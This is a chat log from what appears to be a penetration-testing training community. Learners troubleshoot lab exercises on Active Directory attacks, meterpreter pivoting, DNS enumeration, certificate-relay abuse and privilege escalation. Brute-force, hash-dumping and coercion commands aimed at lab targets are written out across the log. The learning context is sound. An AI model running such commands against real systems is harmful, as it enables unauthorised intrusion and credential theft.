#modules

osint is taking a wrong turn 😂

In the AD module, i can´t RDP into the Windows host in the "LLMNR/NBT-NS Poisoning - from Windows" . Tried it with my own system and Attack-Box. xfreerdp stays with a black screen and rdesktop says that the credentials provided are incorrect. Is this still in correlation with pinned message, about spawning/conncetion issues?

hit enter

what's going on everyone suffering from this black screen lol

it's just nomal windows things

yeah , also the labs are slow this days

XD i feel stupid now

but this is what osint could be about

dw it happens for a lot of ppl

Osint is boring imo

I know, but recently it feels like half the time, it´s more about troubleshooting technical issue with htb then the challenges in the boxes themselves

Hey Guys, Has anyone here has issues with ffuf being really slow from a local kali VM? only getting 28 requests per second even using 200 threads

the backscreen is not a htb issue lol

This is against the target in the ffuf module

That is true, thats on me, but the thing is when something is not working as i thought it would, i tend to think it´s an issue with the platform.

i am on a rev meterpreter windows shell that was executed on a web asp shell so i can get more of a stable shell, with my meterpreter rev shell i pivioted into a box with proxychains and got in with rdp and im trying to import that pivoted rdp host with powerview but it seems not to work at all

Anyone having connectivity issues with the AD machines?

The ip spawns, but the rdp session never opens

Yup same here, use the attack-box, that worked for me

what does doesn't work at mean? what are the errors and what commands did you use

all powerview commands gives command is not recognize

Yesterday AD labs worked after about three respawns, now just getting this

how did you import it? and did you oepn a system shell to do it?

i opened a powershell in rdp and did Import-Module .\PowerView.ps1

when i do Get-Module it shows PowerView is imported

what's the powerview command that you used

any command from it, Get-Domain

Get-DomainUser

Is there a particular VPN we should be using to gain access to the AD machines? I have tried respawning 5 times already. Can't RDP into the lab

can you ping the machine?

pinging is fine, it's just the rdp access

I just checked.

Something is wrong with the windows machines

make sure you use the right creds

and single quotes for password

yeah i was about to say that

something simple like ! can ruin the password and would recived without the !

so like

Password!23
Would be recived like
Password

so either escape special characters or use quotes around it

They were working yesterday, just took a while to connect. I'll read ahead and come back tomorrow.

Try the TCP VPN

weird I've never seen this happen, run

Get-Command -CommandType Function | Where-Object Source -eq ''

if you don't see any powerview commands, then it probably didn't import correctly or your powerview copy is broken

General question about XSS, why did we need “> at the start of our payloads for the XSS module?

read the page source

Closing the html tag thats before

Cheers

anybody else having problem with acadamy not completing a module when you finished it?

make sure each sections have a tick on them in the table of contents

It has

no it doesn't, there's one tick missing

ooh i see it now. thank. sorry

thanks. sorry for wasting your time.

all good

anyone

try with valid creds

those are the valid creds

Hey guys in the skills assessment for the CDSA thing is there away of knowing why your answers or wrong or right?

may i dm you

im having trouble installing linux on my virtual box.. because of uefi settings, can someone please help

i was logging on smtp and then by out of curiosity i tried pop3 and it worked 🙂

Nope. Show here the steps you've taken, the module and section name. Why you think your question is right. And wait for someone to answer

Oh ok

Damn that sucks tho

Otherwise people would just get the answer and move on.

Trust me. It's better this way. If there are issues in the module. Add to #errarum

No the thing is it’s a multiple choice quiz for the skills assessment so I got the answer anyways and I Agree with u by the way

But still some help alone why it’s wrong is good

Hey ppl

if i cant acces my BIOS-UEFI settings, am i doomed and i cant use any virutal machine because i cant enable hypervisor partion?

If you mean... You can't enable virtualization in your host... Then yeah that'd be a problem

Why wouldn't you be able to access your uefi

because i tried youtube guides, chat gpt help and what not to get there

something is bugged or something

it doesnt go there

you say it's not working but didn't give any details, what have you tried, what errors? also this isn't a tech support channel

im trying to install centos 9 on virtual box, i considered to give up and try other Vm but actully others wont work as well correct?

thanks for asking, i tried f12 and del , i tried commands to redirect me there after boot, i tried command to set the after boot directly there, i tried from "recovery" the restart option and i got there. the closest "try" was after i click the uefi firmware settings, it says "restart to change uefi firmware settings" i click restart, and nothing hapens just normal restart straight to desktop

this is the error i get : Not in a hypervisor partition (HVP=0) (VERR_NEM_NOT_AVAILABLE).
AMD-V is disabled in the BIOS (or by the host OS) (VERR_SVM_DISABLED).
Result Code:
E_FAIL (0X80004005)
Component:
ConsoleWrap
Interface:
IConsole {6ac83d89-6ee7-4e33-8ae6-b257b2e81be8}

this isn't a tech support channel, post it at #1024429874246590575 which as much information as you have, especially the steps you tried to get into bios, there should be no reason you couldn't access it

thanks i will try. but do you think it fixable?

there's nothing to be fixed, you just have to enable an option in bios

can i dm you?

post it in #1024429874246590575

thanks i did it

Hi, can I ask somebody for help relating "DNS" section of Footprinting module in HTB Academy, please?

https://dontasktoask.com

Just ask it here dude, it's also likely your question has already been answered here too

Discord search be wild

it will be the same question as couple days before ... working on DNS in Footprinting module - the 4th question is relating to finding FQDN of a host where the last octet ends with .203. I discovered two zones and used all of the wordlists available in Pwnbox. No host was found. Can somebody give me a hint what wordlist contains that host, please?

try to find all subdomains using AXFR , then try to find all the subdomains of subdomains using one of the tools from the section

well, the dnsenum discovers less than gobuster ... the AXFR can be done with one domain only. the enumeration of the domain which has the zone transfer enabled is reporting "Refused" on all requests (bruteforcing of the hostname does not work).

some AXFR is allowed for some hosts and not for others

• ther's better tools for this stituation than the ones you are using

the AXFR is enabled for one zone named in****al. There is no AXFR enabled for other zones/hosts. Hostnames of one zone can be bruteforced.

Honestly I felt down to analysis by using dig/host/nslookup and wireshark.

well if you find this , then you found a lot of subdomains , try to brute force them using other tools

this = the "in**al" zone or the second one?

bruteforce the subdomains you found

I've already done - the in**al domain does not contain anything usefull (all responses from DNS are "Refused"). The second one contains some hosts, but none of those hosts ends with .203 in the end.

can you share the wordlist you used?

don't bruteforce the in **al burteforce sub.in **al

ok, thanks, I will try ...

Dnsenum works just fine for me with a fierce wordlist on the right subdomain

I believe i said last time: there's more than one subdomain to try

A zone transfer will be better on the initial domain, and you've already ruled out the 'internal' subdomain

If you run dnsenum against the right subdomain it'll only take a few minutes for it to find your answer

So far no joy ...
axfr against "inla*.htb" was done --> I've got the internal subdomain.
Then I tried axfr to internal - I have the list of hosts/zones.
I tried to BF (with the wordlist provided by you) the hosts against sub sub domain ... all responses on my requests are "Refused".

There's more subdomains on inlanefreight.htb

yes, but those domains do not respond to axfr request.

You don't need to bruteforce internal, it's already freely giving its info to you

That's where dnsenum comes in

It bruteforces them for you

anyone know how to solve this ?
ps : Idk why , but i will not use ligolo for this one

When you compile chisel you need to do it statically

I just ran go build ....

or just grab the binary from github, should work for most gcc versions

finally, got it. But by using gobuster.

¯_(ツ)_/¯

many thanks to @fathom pendant and @limber river. I'm going to discover where was the issue

Didn't know gobuster could bruteforce like that

But the intended way is with dnsenum

well that's seems fair

Hey guys, can someone explain how Split-Tunnel VPN work?

i am currently reading the module, but i didn't quite catch the meaning

It means the vpn only accesses resources on its subnet

It splits the network connection.

The openvpn for HTB is a split-tunnel, you can still use your network connection - while also accessing the internal resources

oh i think i understand it now, accessing the VPN's network and accessing the WAN are 2 separate things in this case

using a vpn to change your location would be just 1 thing, since you access everything through the same network

right?

However, for a company, split-tunnel VPN's are typically not ideal because if the machine is infected with malware, network-based detection methods will most likely not work as that traffic goes out the Internet. didn't understand this part either

So using a service to change your location is different

The tunnel goes through the internet to connect to the endpoint.

eeee

it's still happening? damn

bruh still loading whats wrong with htb

i hope its ok to offerr it here, im just really desperate, i cant install vm because i have problems not letting me open the BIOS/EUFI settings, ill pay 100 dollars paypal to whoever sorts this problem

use wsl i guess

what is wsl

windows subsystem for linux

can you help me sort the problem?

i tried everything youtue google chat gpt has to offer nothing worked

not without knowing what it is

contact whoever built your pc

or watch a video and see how the guy is pressing the button, getting into bios is fairly simple,

its simple when there are no problems

there is a problem that make it impossible to me, i need help

i tried several ways geting there many times so easy its not

what problems? your computer literately wouldn't work if there's no bios. like I said, contact whoever built your pc

dont even remember who it was, some agent from some company

Then contact the company

Surely they have some way to contact their customer support

ill order a technnican or something

Either way your technical issues don't belong in this channel

we've provided all the help we could, only the people who built it can help you now

they werent answered anywhere else it thought offering money and maybe somone would know how to fix it here

is anyone else facing problem on spawning ?

It doesn't matter, this channel isn't for that

🎉 🎉 🎉 finally

Yeah, A lot of people are I think marci can link u to the chat or smth.

You would have to scroll up a lot though.

eu1 works, just spawned a lab with 5 machines

i can change the location?

yep, above the pwnbox window you can select the vpn servers

Hello why I don't have a preview? plz

Try escaping the arrows

\< and \>

This?

Also if you take out the grep pipe do you get something?

yes

Then what you're looking for isn't in the grep

yea i thought i was blind or something

In module Windows Privilege escalation and section Pillaging. Last question is: Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.

I restored backup and then moved sam files to my machine and used secretsdump to extract hashes. But that answer section in question is always saying wrong answer. I tried to submit nthash, lmhash, and the whole thing but everytime wrong answer. Did I miss something?

did you try to log in with the hash?

I am following the course and I don't understand it asks you to do the same thing for the exercise as what is in the exercise

So I follow the course and also try the bash code doesn't work either

¯_(ツ)_/¯

it is the one on the rightside, are you sure you tried with that?

Got certificate error when trying to pth with xfreerdp and error with evil-winrm too

Guess the hash is wrong one then

no it wont cause certificate error

try with /timeout:100000 in xfreerdp

[11:13:07:279] [248656:248657] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:13:07:279] [248656:248657] [WARN][com.freerdp.crypto] - CN = PILLAGING-WIN01
[11:13:07:493] [248656:248657] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[11:13:07:493] [248656:248657] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1 ``` This is the whole failure, there seems to be logon failure too

oh yea

you have to use Administrator hash, are you sure you did that

Yeah, I'm sure that Im using that hash, but I dont think the hash is right because the asnwer is section is not accepting it

dm me the hash

Hi all, im currently doing the nmap module in academy and my scans are veeery slow. I'm located in the EU and also use the EU vpn. Whenever I'm on the main HTB platform and scan boxes it's quick. It's only on academy it's this slow.

show your nmap command

sudo nmap -p- -Pn -g 53 10.129.20.50

-p- will take long

add --min-rate 1000

Yeah true, I'll try that and see if it helps. Thanks!

okay but I don't help me ^^"

i'm just saying the thing you're grepping for isn't in the output, so maybe they meant to do ?id=2?

if that's what the document id from the previous part was

I have my scripts, I just test the basic command it is not okay how to try my commands to know it is okay ^^"

it is okay for this

considering the example right after is ?id=3

so it seems weird to skip 2

yes ^^"

try restarting the lab then? ¯_(ツ)_/¯

restart the lab then?

againt?

¯_(ツ)_/¯

try running the curl/grep without specifying uid

okok

🥲

haven't done this module so idk ¯_(ツ)_/¯

wich section/module ?

WEB ATTACKS
Mass IDOR Enumeration

leeme check my notes

why are you greping this ?

Who knows game programming?

I find!

Anyone else been having problems with RDP connections? My connection has been very slow after weekends issues and sometimes I get reconnects. I use remmina and I didn't have any problems last week when I was doing Active directory module. All sessions were pretty smooth. Now its pain to use RDP

just ask your question my dude if it's related to an academy module

tcp vpn?

@fathom pendant I use UDP one

use tcp

Okay, lets try that

In private

using uid ?

if you can't ask publicly, then no

read #welcome on how to access more of the server, there's a #programming channel you'll be able to access

hello all i cant for the life of me spawn any targets cleared cache and cookies logged out and in nothing anyone else facing similar issues

Hey guys can I join somebody’s team for capture the flag?

this isn't the channel

read #welcome

Any good resources for privilege escalation? I spent like 4 hours last night in the last portion of the Linux fundamentals knowledge check. I got the first flag but couldn’t get the flag for the root user

everything you were taught in the module should be enough to privesc

there's nothing that's too complex to do

Hmmm

Ok

I’ll take another look tonight then

you have user: see what you can do with user

iirc this is a sudo -l and a specific binary that you can check gtfobins for

I couldn’t ssh into user ? Or are you talking about metsploit?

if you have the first flag you have a user

Maybe I’m a slow one can you help me which server is the right one. My first guess was Academy but like you said I’m wrong. But still can not find any server called: CTF Teams, Joining, and working together or something like that…

I got the first flag through metspoit..

there is no exact room for ctf teams, this channel is for htb academy modules

Sudo isn’t a command option when I’m in the server through metsploit

i don't recall using metasploit for this

you have to drop into the shell

So then I should quit this channel?🤣 Bro I’m a newbie I have no idea yet with hackthebox

I’m sry for bothering man

read #welcome there's instructions there that'll help you access more of the server my dude

I’ll show you what I did later. I just got to work. I’ll be back at home later tonite

Oh…. Ya know what. I think I know who I can ssh into the server as. The user profile I found the flag in while I was using metsploit

i just mean if you're using msfconsole, and you have a reverse tcp connection: using shell you drop into the interactive shell of the machine

I used msfconsole to find an exploit and used the exploit

I changed the ip and LHOST and did the exploit command and got in

Yes.

That’s how I got the first flag

If you type in shell, it'll drop you into the system

From there you can do everything else

Can I use a shell command in metsploit console ?

Not really

hi! i got a bit stucked at the command injection assessment 😄 i dont think i found the place where i can inject the commands and accept it. Can someone point me to a directions?

It's a lot simpler/easier to just drop in and do from there

I found the flag in a profile called mrb3n or something in metsploit would I use that profile to ssh into the server ?

What I'm saying is there's literally a command called shell

I know

You don't use .profile to ssh

I know that but you need a password for any user

Besides if you do sudo -l it may be more enlightening

Than just guessing

1 sec

Always see what your user can do

What I was thinking is ssh mrb3n@<server_IP> that’s the user dir I found the first flag in

Or would it just be user@<server_ip>

Oh wait

I’m dumb as fuck

You're already a user

Sorry Marcie I was mixing shell and ssh

I thought shell was the command language ?

Yes

I just was referring to msfconsole

To drop into the session

… yes I did use msfconsole to drop in. That’s how I got the first flag

Is something getting lost in communication ? I feel like I’m missing something

Is there anybody named One-Nine9 here? I received a notification from this guy saying that my account appears in a publicly disclosed data breach

run shell in msfconsole

meterpreter and the system shell are two different things, you can get a system shell in meterpreter by running shell

After I connect to the exploit or before ?

I’m confused what step i should do this in

meterpreter:
meterpreter> shell

don't leave me hanging fellas 😄

Hi All,
Regarding ADCS ESC11 first qa is to compromise WS01 but when WS01 is CA is it possible to be relayed to some of the templates ? ( because I tried to all of them but no success and when relay the DC getting the cert)
Thanks

So before I exploit into the server

what do you mean by this? you want to relay ws01 to ws01?

look at where you should be typing the command at

That's after you run the exploit

Thank you Marcie

So once I’m in the server where I found the flag

How can you drop into a session if you don't have the exploit runnkng

Actually yes that's what I am trying i got the flag but from getting the DC certificate and then DCSync but in the question was said abuse ESC11 and compromise WS01 and I understand than need to triggered WS01 to authenticate to itself but not success and not sure if its even possible

self relay is not possible, yes

Isnt running the exploit already dropping into the session?

meterpreter session and the system shell are two different things

Hm ok I’ll swing back once I’m home I think it’ll make more sense to me if I have it in front of me

https://docs.rapid7.com/metasploit/manage-meterpreter-and-shell-sessions/

Great, Thanks for confirmation.

@next bronze Just one more question regarding Certificate Mapping.
I played some time with it but the thing that cannot figure out is when this is happening when Certificate is used to authenticate to the DC for example getting TGT or also when we enroll to receive certificate ?

Because when I perform Golden Cert attack and generate Certificate with it with ForgeCert for example the SID is not presented and getting error ( when Mapping is set to 2 ) but when I request new certificate with the already forged one and adding the SID the certificate authenticate and get TGT successfully. And for this I am thinking that Mapping is only in the DC when Certificate is used to authenticate but not 100% sure

not sure about that one, don't remember having to specify the sid when I did it, you can use -debug to get more info

INFORMATION GATHERING - WEB EDITION
trying to get the curl from app.inlanefreight.local but im getting error: [★]$ curl -I "http://${TARGET}"
curl: (6) Could not resolve host: app.inlanefreight.local
can anyone help me please?

Hmmmmm….

Actually this is the problem that I cannot see but as from prob and test I assume that Forging Cert for template even without SID is going to be forged and received but when you try to auth to the DC will receive an error SID not match or something similar. and in this H case with the gold cert was working to forge new fixed with the old one that is not accepted by the DC
Will try also to look into the logs

Thanks again for the help really appreciated

Is app.inlanefreight.local in your /etc/hosts

is there even an option to specify the sid with certipy forge? do you mean -subject which is the DN?

@next bronze A, no not that param (-subject) its called /sidextension:.
not sure if there is documentation you can find it in the github source code

oh you're using certify?

its available for both the C# one and Python one

-extensionsid for the certipy and /sidextension for the certify

should just be -sid for ceritpy

https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d

From an updated [MS-WCCE]: Windows Client Certificate Enrollment Protocol section 2.2.2.7.7.4, “The CA MUST consider this extension [szOID_NTDS_CA_SECURITY_EXT] from request attributes only when the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is set on the corresponding certificate template object.” That is, when requesting an “enrollee supplied subject” certificate the szOID_NTDS_CA_SECURITY_EXT is not set in the certificate by the CA by default. Rather, the requesting user is allowed to supply the szOID_NTDS_CA_SECURITY_EXT extension in the request.

In fact, once May 9, 2023 hits, all requesters will have to supply the szOID_NTDS_CA_SECURITY_EXT extension value as without that value (or a strong mapping) present in the resulting certificate, authentication against the DC will not work.

We have recently updated this in Certify with the /sidextension:<S-1-…> flag to support this. It uses code from Carl Sörqvist to build the extension properly and include it with a certificate request for a template with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set.

https://medium.com/@Ishwar-Kumar/how-i-bypassed-a-i-6aa433370050

mhmm did not test -sid I am using this one extension from certipy

But this could be due to different version of the certipy will check the new one

might be, I have the latest version and there's no -extensionsid option

Nothing like that was mentioned in the module though….

I’ll message you when I’m back home

Once you're in the reverse shell, you have a user. From there it's just leveraging what that user can do

Yea just checked the latest and maybe is changed or it was from another repo

Somebody please help 😵‍💫😵‍💫 I’m on windows priv esc first assessment I can’t find the file with the ldap admin credentials

@next bronze Just out of curiosity ESC11/8 could be done also with machine acc credentials ( I mean to invoke/trigger Coercer for example ) ? ( Because never tested it )

i forgot to add it on, tks

like Coercer coerce -u 'machineacc$'? yeah any domain creds will work

So I’m confused is shell a command in it self?

Like shell…… etc etc etc

Cause the hint for the root flag is LinPEAS and another thing for privilege escalation ?

So in msfconsole, after you run the exploit, typing shell will drop you in

LinPEAS is an enum tool

Then the hint is wrong or something…. Hmm

Msfconsole has an upload/download command

The hint is to use linpeas to find the weak point

It's pointing you in the direction

Need assistance with Password Attack Lab - Hard. I can't seem to bruteforce Johanna's password. I used cme with the mutated wordlist, given password list, and rockyou but either it doesn't find the password or takes hours to go through each listed word.
Any tips?

Oh so the next step after linpeas would be to use shell if I’m assuming what you are telling me.

The next step is to use linpeas in the shell

That's making some things more easier to gain access.

Just encountered case when relayed normal machine (low priv) to DCs template and got only the priv key of the low priv machine. And saw that is part of THEFT4 and was wondering how this private key can be used to enroll for certificate ?
I think this need to be done manually like creating and singing the CSR but did not find any option in certipy/fy for that ?

I see now

Maybe found several ways need to test them with openssl and ps commands

Nvm guys I found it

This isn't related to a module per se, but every time I use SharpHound to generate BloodHound data, I am unable to import the computers.json file. This is on both pwnbox and my own machine. Everything works fine with bloodhound-python. Has anyone else experienced this?

I've tried updating BloodHound and getting latest Sharphound release

the latest sharphound is only compatible with bloodhoundCE

Nice. Thanks

There's still a free version

sorry bother you @languid fjord or any other moderator, but the Spawn machines issue is still present?

afaik, things are working okay as of now

ok., thanks, lemme check if I'm the issue LoL

The issues seem to be intermittent at best atm

was able to spawn targets on eu-1 just fine here

Hey all, I am having a hard time with the Javascript Deobfuscation Module: Deobfuscation question. I have gone through everything and I fully understand the concepts; however when I use the tools I am getting errors in the results and the question will not accept the flag. I know that JSNice no longer works with the module, but I'm stumped as to where to go from here. Any help would be awesome!

I used programiz and the print() method

Any tips?

Could I get a little bit of explanation on the print() method please?

I'm in the US zone, any recommendation cus the spawn machine is not spawning....

which module?

Windows PrivEsc

hello guys, im having some trouble in the linux module

with this question : Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

i can't get the answer right, i need some help

Just print the last bit instead of executing it

Do I need to unpack the code before plugging it into programiz?

Nope

The print method is used to unpack it

It's explained in the module about using print

I'll read back through and try again. Thank you for the help!

Seems to work h ere on us-1

ok., lemme switch to us-1, thanks

I just found it! I think my eyes glazed over it the first time lol, now I feel foolish. Thanks again!

It happens

it just sucks JSNice doesn't have that functionality anymore ¯_(ツ)_/¯

Yeah it does, I'm just having trouble knowing where to plug in the console.log bit, do I replace 'return' with it?

You can, yeah

I believe that's what I did

I mostly glazed over this module

even doing that I'm getting it to return anything?

I just input a print statement instead of the execute ¯_(ツ)_/¯

I think I replaced eval with print

That seems to have done the trick, I was being to literal with replacing return lol

It also looks like there's other sites that's mentioned

So they must've updated it since I last glossed it over

That last suggestion got success, just had to figure out how it wanted the flag formatted. Thank you!!!

Ye

Also for the skill assessment, read the questions carefully

It's easy to get ahead of yourself in it

Will do! Thank you for the advice!

That really goes for any of the module questions, sometimes you can overthink the questions

Hey, I am trying to solve the mssql service in the footprinting module, The first question asked to list the hostname of the Mssql server , i ran nmap for it sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248 but getting this as output

Hey everyone, I'm still struggling to connect to the host in Kerberos Atacks, Kerberoasting from Linux. The ssh connection times out. Earlier this week (or the end of last week?) there was an issue with the eu servers so I attributed it to that, but that was resolved, no? Can anyone check it out please?

https://cdn.discordapp.com/attachments/796770441166979142/1199815125461389342/image.png?ex=65c3e9e9&is=65b174e9&hm=7601970bd1879986ec9b36940cb24bc67a9369722fccb7144d4caa0f04e31938&

You can just do ms-sql* btw for the script thing

But you can also just use other methods of getting the server hostname

Also don't set any script args, maybe that'll net more results

you'd need to add the debug flag to know more ¯_(ツ)_/¯

NSE: ms-sql-dac against 10.129.133.95:1433 threw an error! /usr/bin/../share/nmap/nselib/mssql.lua:3334: bad argument #1 to 'ipairs' (table expected, got nil) stack traceback: [C]: in function 'ipairs' /usr/bin/../share/nmap/nselib/mssql.lua:3334: in function </usr/bin/../share/nmap/nselib/mssql.lua:3327> (...tail calls...)

Getting this error, when i used the -d flag

¯_(ツ)_/¯

I never had any issues with the section so idk what your issues may be

https://github.com/nmap/nmap/issues/2622

Ah nmap version issue

This included the issue though still dont know how I can fix it

Maybe you can downgrade your nmap to an earlier version and it'd work

will try

But you can also just try doing -A to see if that gives you a device hostname

How can i downgrade??

Search "apt downgrade"

Google is a fantastic resource for these things

Hello. Anybody found any issue with flags in academy? On Nmap module (NSE scripting), looks the HTB{} flag found is not recognised as correct....

Extra spaces

looks there is any extra space before/after HTB{flag} string :/

Double check

Sometimes it's tricky

thanks but i am unable to find a version list

for parrot

It's not gonna be for parrot

It'd be a version list for nmap

I even tried to rewrite manually the whole string (checking each character and no spaces). Still not correct...

it just says this E: Version '7.91+dfsg1' for 'nmap' was not found

ok i feel stuck

i will just use my vm

Also if you are still using script args, you should specify a blank password with ""

i removed the args but im getting other errors when i try to downgrade

¯_(ツ)_/¯

well i am trying on my local vm, hope it works

"Examine the target" this means break in right?

It means look at it via whatever means you can

Hello guys im new in the platform!

hope i can achieve my goal with it

Read #welcome , this isn't a gen chat

I tried the lab just now and it worked. I'm using a Parrot VM, and used 'eu-academy-1' VPN connection.
I did have to wait over 20 minutes to be able to RDP to the bob user from within the Kali target

it seems such a casual way of putting it :p
guess im up to the point where breaking in is a given.
up until now its either given credentials and then had to find more info with them, or the question has been to find those credentials
this one the first question just assumes that i already have access to the target without giving that access

Or it's telling you to look at the available ports/info and determine the best way to attack it

The module should have prepared you enough to that point for you to make the right step forward

oK I had to update my nmap version from 7.93 to 7.94 and it worked

this module on its own didnt (thats what i mean, the whole text of the module is what to look for once you are already on a target) but hopefully i have learnt enough in general 🤞

Which module and section?

Bc I can guarantee you they gave you info on how to look for stuff

well i guess actually the module technically did, its the section that didnt say anything

Password Attacks -> Linux Credential Hunting

Oh

You need to save all credentials you find in that module

i dont need help (at least not yet) i was just a bit surprised at how it suddenly jumped to just assuming i could access a target

Because you can

You just need to use a set of credentials you grabbed earlier

ah interesting, i do have most of them i was just working out which service would be easiest to attack

All the linux targets are linked in this module, same with the windows

This is why I believe I advised on saving all credentials you find when you first started this module

This is why

ye tbh i was already saving most of the info i found anyway

https://i.imgur.com/Cc9DOsY.png

i have like this for every module / section

Hey still working on Password Attack Lab - Hard and been working the brute force all day with no results. I've tried on|| WinRm, SMB, and RDP using CME and Hydra for user Johanna using the mutated list, password.list, and rockyou||. Can anyone provide any guidance on what I may be doing wrong?

Is there a null session on SMB?

I forget this lab

No

Did you get a username?

That should be your first step

Just the one provided from the scenario

||Johanna||

Just reread your thing. But yeah shouldn't be much, rdp should be an easy thing

Why does this course give you questions that you arent taught to answer in the module???

I mean wtf this is a scam operation lmao

I'm just not sure what else to try. I've tried ||crackmapexec rdp -u johanna -p mut_password.list 10.129.X.X and hydra -u johanna -P mut_password.list rdp://10.129.X.X. || I've even switch wordlists and they just go on for hours.

Nah the modules definitely give you the resources to answer questions dude

Not in linux basics

The forum literally proves that too, this is literally a setup lmao

Linux basics is kinda shit but it's not impossible

" What is the path to the htb-student's mail?"
You can't get that without using cat or grep

I mean the env command exists

crackmapexec works just fine, I'm guessing you're just missing the --local-auth flag

^

I've tried that as well

One of the sections literally gives a list of commands that you'll likely use

man env says literally says 'run a program in a modified environment'

it's the solution in my notes

If you just do env It lists all environment variables

is it literally after this page 💀

You dont put the instructions on the second page and the exam on the first thats just brainlet logic

A lot of this module I'll concede is out of order

crackmapexec for smb and the mutated list with that flag

I'll give it another go.

Well then they should get off their lazy asses and fix it

But it's not a scam lol, most of the modules are better than that one though

Suggest the fix in #858470491676737536 dude

have a look at the "Cheat Sheet", that lists a buch of commands that might come in useful

or more generally, info that might be useful for the particular module

Besides, the tier 0 modules refund their cost when you complete it

also a shorter list of commands is at the very top of the first section with questions

So it's not like you actually pay anything for them

Just very frustrating because I don't like to cheat in any sense

and I don't like wasting an hour to realize the information isn't even given to us prior to the exam

the cheat sheets aren't cheating

god forbid you do research and use google

The cheat sheets are just a compilation of the commands in the module, generally without context

I'm not afraid of doing research but I feel that its a waste if you're not trying to figure out things. I take the same approach with programming I don't like to go and find the answer without thinking about the problem and using the bare tools given to me to figure it out. How else will I improve? I didn't realize that things may be out of order I expect more out of a site that has subscription plans as high as $68 a month you'd think they'd polish what they charge for.

Guess I have to refer to this sheet

the command you needed is listed at the start of the section

well, they're not charging anything for that module, the pentester path is the best course on the market, can't say about the others but feedback on them has also been overwhelmingly positive

The tier 0 modules are free, you get refunded upon completion of it

in any case this is a field where research and google are your best friend

Some of the sections are out of order, but not impossible

¯_(ツ)_/¯

Fair enough
And yeah I started this course because a company was willing to help me get situated with pen-testing as long as I complete this course entirely. So I'm trying to hold myself to be very knowledgeable so I can have competency in the minimum expectations they have for me once they take me in

they want you to complete the pentester path?

Yes

Also wanted me to pick up Python

then stick it out, you'll be pleasantly surprised when you get into it

I hope so I'm only familiar with software engineering and nothing else, I'm going blindly into this. I can't even figure out how to use grep the terminal stops responding when I try using it 💀

depending on what command you're using, you might be searching the entire file system, it stops responding cause it's doing its job but it takes a long time

If you're new to Linux and stuff on a whole: I hope they're not holding you to the 43 day timeline

#858470491676737536 message

btw studying after taking an exam has been proven to be one of the most effective strategies for learning the information

https://source.wustl.edu/2006/04/repeated-testing-better-than-repeated-studying/

Can confirm, any test I can do multiple times and learn from is better for me to learn from than reading sometimes

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC10229024/

are those articles on topic for this channel ? 🤔

yes

were discussing the Linux Fundementals module and its structure

He told me I should be able to get it done in a month

that's not gonna happen 💀

I worked with Linux a very very long time ago and remember practically nothing

Yeah no it isn't 💀

If you're new to pentesting and tools, you'd have to spend 16 hours a day to meet that deadline

Most of the people that are new on average spent 3 months on it

I know very experienced people that havnt burned through the course in a single month

unironically this is literally wake up and study and dont stop till bed time territory

I'm giving myself a minimum of 15 hours a week to be working on this, I also have to allocate time to work on making sure I don't fall back on programming skills again

The other thing in this field is patience

And waiting for a tool to do its thing

having the programming skills is good for some bits of it i think

and I have a part time job starting up soon so that'll make this interesting

noted lol

Thats what he said but I think I have to pick up other languages most my experience was with Java then C++.

One of the longest modules is password attacks, just due to how long the attacks take

learning both at the same time can be difficult for beginners

I'm assuming brute force is the one that takes the longest? 😂

Yep

at least you have prior dev exp, thatll make the programming learning quicker

definitely but this feels like learning from square one again

Most programming stuff is easily transferable

It took me nearly 3 years to understand object oriented programming

and 3 more years to understand OO is shit

If you want experience with learning Linux command line stuff, I highly recommend a command line/terminal game called "bashcrawl"

Its unironically a decent way to learn some basic navigation commands

pushd and popd are super handy if you need to temporarily switch to a different directory

spend a weekend installing LFS

I'll look into it I definitely want to have the basic commands down

Well I figured out the question but I'm confused with how I was supposed to know I had to ||use cat /var/passwd ... how was I supposed to know its located in /var/passwd||

What's the question?

Also I've not heard of /var/passwd, I've heard of /etc/passwd

ok i give up 😦 cany anyone confirm/deny if ||sam ||is the correct user to be logging in as for linux credential hunting unit (i can get in but then not access a bunch of the files that are relevant to the section text)

No

There is another

[k]

ok thanks

:( this is flying over my head, none of these questions relate to whats taught on this page besides the first two

You can use Sam though to check /home/

They probably do, and it's definitely going over your head

There's no shame in asking for assistance

I may have been mistaken about you already having these creds

I forget if credential hunting is early or late in that module

i dont think i do have the creds (whether they were ones that i should have found earlier or not im not sure) but its ok, ill go back to original plan of attacking this as a fresh target

I am a beginner in cybersec and i have a problem in that module https://academy.hackthebox.com/module/18/section/70

Use Sam to check /home/ for usernames

what was the question tho

Well, with the question What is the path to the htb-student's mail? How am I supposed to figure out what to use? || cat is shown later, and I don't know why cat /var/passwd worked. It showed me /var/mail in the list and I assumed mail would have a folder for /htb-student so I entered /var/mail/htb-student and it was correct||

I give the answer : /var/mail for the question + 0 What is the path to the htb-student's mail?

env

Because that's not the full path

oh

looks like we now have 2 people on the same section :p

thx

What is the first directory ?

That’s a hint

Just use ||env|| lol I didn't realize it does that

I try that and i come back if i lose

I said it a few times earlier

🤦‍♂️

||env ||command is useful for finding info/settings for the current user

And even explained that if you use the command on its own, it lists all environment variables

yup

In the format
VARIABLE=VALUE

and even if you didnt know what you needed was an env variable, you should go through each of the unfamiliar new commands it introduced to see what they do 🙂

^

man <command> go brr

